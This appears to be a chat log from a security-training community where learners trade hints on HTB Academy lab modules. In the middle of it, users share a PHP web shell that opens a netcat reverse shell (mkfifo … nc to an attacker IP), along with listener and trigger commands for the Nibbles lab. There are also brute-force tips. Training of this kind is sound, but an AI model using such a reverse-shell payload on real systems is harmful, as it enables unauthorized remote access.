I have completed that module but to be honest I got lucky on that answer. The reason I got it was just dumb luck. I picked a number from something I saw in a scan but found out after that it really was coincidence

The same happened to me. And now, I can't even see the hint XD

The way it was explained to me is that the presence of "A" record(s) is one zone, "NS" servers makes it two, and if there was "MX" then that would make it three.

Thanks Jared!! I thought maybe it had to do with the number of NS servers or something. lol

Yea I'm still not entirely confident about that one. It's still very possible I am incorrect haha

Your explanation makes much more sense.

I am so mad!!! Somehow all my notes on the command Injection module did not save. :(((((

Now I have to go back and redo everything so I can note it all. AGAIN!!

RIP 😦

No google drive?

apparently not. Although since the document autosaves I am not sure how it happened.

Well, I just found another copy!! All is saved!! Praise backups!!

question. i just set up my personal Parrot vm and now im trying to figure out how to use it for academy modules. i can seem to find the vpn option in the ffuf module. is this normal? or am i looking in the wrong place. usually i see it around the cheat sheet at the bottom of the page.

@rustic sage hmmm.... I'm actually not sure.

It looks like it's missing in the FFuF module. But i just checked Windows Fundamentals and the VPN key is located here:

yea thats what i saw. i looked on reddit and ppl are syaing to just connect without the vpn. seems kinda suss

I've seen on some modules I was able to interact with the target while I was not connected to the VPN. Specifically when it looked like a docker instance of some sort.

Like if the target was 10.129.108.223:30508

ahh ok. ill give it a try.

i need some help

i am on module WEB REQUESTS
on section HTTP HEADERS

this is the question

can anyone help, i found this :

there is no flag

can anyone help?

Module: Getting Started
i'm having a hard time getting a reverse shell on Nibbles, i uploaded the php line using the My Image plugin but for some reason when i try going to (ip)/nibbleblog/content/private/plugins/my_image/image.php it won't load, i tried both on my linux machine and the pwnbox, but i'm getting the same exact result

can you send screen?

sure wait a sec

can you show me
1: your php file
2: that you have uploaded successfully
3: show me the link

@rustic sage Check here

@west canopy i dont have this

Looks like they updated the module, this section wasn't here when I first completed it.

i'm using this php line <?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [VPN IP] [PORT] >/tmp/f"); ?>

@rustic sage Maybe try refreshing the page?

yes let me do it again but wait let me try help this guy

can you show me your ifconfig tun0?

ok

so the command is going to be:

<?php system('id'); ?>
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.169 9443 >/tmp/f"); ?>

upload the file again

then on your bash do ** sudo nc -lvnp 9443**

and last do:
curl http://10.129.164.10/nibbleblog/content/private/plugins/my_image/image.php

that should work

ping me if you need help

@rustic sage curl gives no output

what do you mean?

can you send me a screen

when i enter the command it does nothing

wait imma try something i'll hit u up later if it works

ok

it worked! i just had to clone my VM for some reason

nice

anyone done Command Injections?

@lethal atlas sure have! What's up?

Hint to everyone. Read carefully. Lol

@lethal atlas hey bud, can I DM you ?

yes

Yes

Use bloodhound 4.0.3

I posted the information on some prolabs channel only

Someone can help me with this? I've tried a different forms using "grep" command but I don't know exactly which pattern I must filter.

what module?

Linux Fundamentals

section?

Filter Contents

It's the last questions

question

ah yes. this question requires the use of several things. Curl, tr, cut, grep, sort, wc. all in one nice command

@unreal hull Feel free to DM me. That question is extremely difficult given that it's a "Tier 0" fundamental module.

I think they should fix that question

Too difficult

For a beginner at least

module web request section http request and response how do i send a get request

on which section

http request and responce

just go to that spawned ip

that's it

and on firefox u need to inspect the element

to find HTTP Headers

Got it ty

module web request

module web request section http headers my target machine doesn't seem to work

@molten epoch Sorry if this is a silly question, but have you tried respawning the target to see if the error persists?

its not silly and yes i tried 4 differnet machines

Ah. Maybe another dumb question, but you're navigating to http and not https right?

idk i just copy and past the ip into firfox

I'm gonna try it on my end. One sec.

it loaded finally but i dont see a file named flag

One of my buddies ran into the same issue. The hint says to try refreshing the page if it doesn't show up... When I did this section earlier today on my VM, the "flag" request loaded automatically

Just loaded right away for me

ok i will keep reolading until i see it

ive reloaded like 7 times and it always the same things

are you using the provided os or are u on you using openvpn

this is all i get reloaded 16 times and counting

hey try on ur machine

I was using the pwnbox just now.

i dont know how to do it on my own machine

really well i will try tomorrow ran out of time for the machine

just open a browser and paste that ip

Hello all I'm working on Skills Assessment Login Brute Force, the Service Login SSH section. I'm wondering if I'm on the right track, I'm assuming it's referring to wither bill or harry?

or am I completely missing something

I created a custom username and password list, but hydra is saying it's going to take 2:52 in order to finish

@summer pecan DM me 🙂

Is the magician, 1337 Y, use Pasword policy from the previous activity. Use his name and username. Dont forget u and f

it should only take 2 minutes to get the answer.

quiet night in here?

hello

i am on module Attacking Web Applications with Ffuf

on section filtering results

this is the question

and when i try ffuf

there is huge output

what do i have to do

its 300+ results

@rustic sage You need to filter the results.

yes but how?

there are many options when i try ffuf -h

@rustic sage Find what most results have in common, and filter them out.

wipe them out?

Ehhh, yes.

size 986

🧹

ffuf -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://139.59.175.51:30727/ -H 'Host: FUZZ.academy.htb' -fs 986

is this?

So, add a filter to your ffuf, that should "wipe out" any result with file size 986

No spoilers here, please

yes but which one is the correct filter?

Where did you get this command from, then?

htb academy ?

Right, so run a ffuf scan w/o a filter and pay attention what most results have in common, and filter them out

yes, how can i filter them out, i cant find the command

Did you try what you typed above?

this?

Yes.

still going

we will see

Have you updated your /etc/hosts file, btw?

oh

no let me do it now

so i do:
<target_ip> academy.htb

?

@rustic sage

@rustic sage Yes.

Hi guys I need some pointers on the ldapadmin password step

On Windows priv escalation assessment

Anyone that I can DM?

anyone have solution for RouterSpace machine?

@rustic sage look bro

this is on nano /etc/hosts

Change your -u flag accordingly to your entry in /etc/hosts @rustic sage

what do you mean ?

Look at the example in that section there. Look how the -u flag is

ok on section filtering results?

Yes @rustic sage

<ip> that_link

In that window that shows you how to run a ffuf scan

i cant find it

i have to take a break

cyaa later

anyone have solution for RouterSpace machine? please

#boxes

Thanks

@west canopy thank you for the help, I wasn't filtering my password list for the ssh challenge, worked in about 10 min once I did

stinking sed commands....

There is a specific channel for new boxes

I think you will need to register to see it

Stuck on Windows Privilege Escalation - Kernel Exploits. I received confirmation that one of the three exploits is broken which is the CVE-2020-0668. Was wondering what exploit was used to get the answer. Currently trying CVE-2021-1675.ps1 but I am unable to use the Invoke-Nightmare command

having issues with subdomain fuzzing. can some one give me a push in the correct direction?

disregard.

@slow ruin So my notes on that section aren't super detailed, but it looks like I had to copy the flag to my machine from SMB

Reached out to support and they updated the module (Windows Privilege Escalation). If you follow the steps using any of the exploits listed you will easily get the flag. I just want to say this platform is awesome!

Did you ask them when we are going to get a new module dropped?

flag is in the .js it not very worded clearly

cant someone help here completely lost.. or a hint

never mind found out how... :p

can anyone help me understand the "Active Subdomain Enumeration" of the "Information Gathering - Web Edition"? i honestly am so confused by everything and ive reread this section like 5 times and read some articles about zones but it doesnt make any sense to me, why are there only x zones, how to get the zones that have disabled file transfer for the other 2 FQDN questions, i get no TXT results.
I checked this thread to see if someone was asking this question and there was a guy who ran the same command as me, but i didnt get any TXT when i used dig but he did

If anyone has any notes or articles please send them my way, i will take a look in the morning. Ive been tunneling on this for the past 2 hours at this point

this is my axfr output

DM me

Hi guys, I am stucking this question (Module: Hacking Wordpress)
Any hints?

Module: Command Injections
All three characters return "Invalid Input" - unless I do not URL encode & - but does not get accepted as the right answer.

Solved...

Perform a WPScan. It will detect a plugin that allows an unauthenticated file download.

some questions are weirdly ask like in some exams xD

Im working on footprinting, FTP.... i am trying to connect to the FTP with anon login but i only get root

if i try to LS i get pw request

nvm zorro showed me how stupid i actually am

its good to be shown our limits. really humbles you

have you ever edited the samba client?

You're not stupid Zorro is just really smart

he is assuming things i never tried to make him stupid

Lol well you couldnt make him stupid...unless

Hello guys, can someone explain me why I cannot use Hydra to bruteforce login-page of Wordpress?
The password of erika is 010203

yoo

am new to hacking codes

👋

Welcome

if anyone can help me with the "Active Subdomain Enumeration" from "Information gathering" i'd appreciate

What questions do you have?

i tagged it so i dont copypaste it

you right, my bad

Oh I cant help with theoretical questions like that, sorry

haha fair enough. can you tell me if im using the right command for dig, what am i missing. i searched this server and a guy was using the same command and was getting txt records as well

do i need to add the server etc/hosts or etc/resolv.conf

K let me take a look 1 sec

sure, thanks

Alright my bad, I was looking for the dms i had, the last time I helped someone with this question, I couldnt find them tho, What question are you stuck on?

all of them after the first one. i got the second one right but it was a lucky conincidence

try transferring the zone... and nsztm1 with what you are curious about

that should give you more domain names

thing is i dont understand exactly what the zones are. i know how many are

is one of them the namepsace?

the first one is what you were originally given the in the first question, second one is the answer from the first question

this would be the equivalent of this

right?

yes

/etc/hosts

hey guys. I got stuck in sqlmap essential in htb academy.i cant find flag for case 6 and 7.does anyone solve them?

but what do i add there? if i add the ip from the box and the inlanefreight.htb nothing happens

Really>

hmm

did you add the ns?

put both in there

nop, changes nothing

if i add the ns there then it is like i do the nslookup with the ip

let me see the /etc/hosts

well ill be

@feral gyro are you around? have you done info gathering web edition?

Alright I will try, i was doing a box so i was putting this off

@fathom bay bro it works

Are you connected to the vpn?

nope from tomorrow i will start that

Its no fun

yep i have done some questions from it

like github subdomains

@cedar meteor ❤️ dont worry life will get better

but until then @languid dawn or @novel matrix can we ban this guy?

Hmm I missed it

👀

Hydra should already work.
But for WordPress there is a simple tool that can use the internal XMLRPC, WPScan.

no one know this?

quite straightforward use the prefix mentioned in the section for case 6 and for case 7 specify the column number

I agree but the speed of WPScan to bruteforce is quite slow... that why I would like to use hydra to make it quick

maybe this page will help you
https://linuxconfig.org/test-wordpress-logins-with-hydra-on-kali-linux